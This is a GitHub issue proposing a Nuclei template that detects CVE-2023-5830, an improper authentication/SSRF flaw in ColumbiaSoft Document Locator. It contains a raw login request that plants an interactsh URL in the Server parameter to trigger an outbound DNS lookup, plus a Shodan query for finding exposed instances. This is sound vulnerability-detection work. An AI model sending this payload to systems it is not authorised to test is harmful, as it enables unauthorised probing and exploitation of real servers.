### ISSUE TITLE
[nuclei-template] CVE-2023-5830 (CVSS 9.8) ColumbiaSoft Document Locator Improper Auth

### ISSUE THREAD

**Issue by mbb5546** [projectdiscovery/nuclei-templates#9267]
### Template Information:

Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to a critical Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login. 

- reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5830
    - https://vuldb.com/?ctiid.243729
    - https://github.com/advisories/GHSA-j89v-wm7x-4434
    - https://blog.gonskicyber.com/cve-2023-5830-critical-security-vulnerability-in-columbiasoft-document-locator

### Nuclei Template:

```yaml
id: ColumbiaSoft-Improper_Auth

info:
  name: ColumbiaSoft DocumentLocator Improper Authentication
  author: Gonski
  severity: critical
  description: Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login. 
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5830
    - https://vuldb.com/?ctiid.243729
    - https://github.com/advisories/GHSA-j89v-wm7x-4434
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-287
  metadata:
    shodan-query: 'title:"Document Locator - WebTools"'
    max-request: 1
  tags: cve, columbiasoft

http:
  - raw:
      - |
        @timeout: 10s
        POST /api/authentication/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json;charset=UTF-8
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept-Language: en-US,en;q=0.9

        {
          "LoginType":"differentWindows",
          "User":"test",
          "Password":"test",
          "Domain":"test",
          "Server":"{{interactsh-url}}",
          "Repository":"testrepo" 
        }


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"


```
Example of template execution:
![image](https://github.com/projectdiscovery/nuclei-templates/assets/31698171/b297a66d-aca8-44ae-abd0-ff17e85cbb3c)
